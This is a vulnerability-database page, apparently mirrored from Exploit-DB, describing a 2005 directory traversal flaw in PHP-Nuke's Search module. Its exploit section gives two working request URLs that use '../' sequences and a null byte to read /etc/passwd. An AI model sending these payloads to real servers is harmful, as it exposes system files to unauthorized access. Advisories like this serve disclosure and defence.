PHP-Nuke Search Module – ‘modules.php’ Directory Traversal

PHP-Nuke Search Module – ‘modules.php’ Directory Traversal

漏洞ID 1055414 漏洞类型
发布时间 2005-10-19 更新时间 2005-10-19
图片[1]-PHP-Nuke Search Module – ‘modules.php’ Directory Traversal-安全小百科CVE编号 N/A
图片[2]-PHP-Nuke Search Module – ‘modules.php’ Directory Traversal-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/26377
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/15137/info

PHPNuke Search Module is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input.

A remote attacker may view files that are only intended to be accessible to authenticated and authorized users. Information obtained may be used in further attacks. 

http://www.example.com/[nuke_dir]/modules.php?name=Search&file=../../../../../../../../../etc/passwd%00

http://www.example.com/[nuke_dir]/modules.php?name=Search&file=../Forums/viewtopic&phpEx=../../../.
./../../etc/passwd

相关推荐: AppleShare IP FTP Server RMD Command Denial Of Service Vulnerability

AppleShare IP FTP Server RMD Command Denial Of Service Vulnerability 漏洞ID 1099151 漏洞类型 Failure to Handle Exceptional Conditions 发布…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享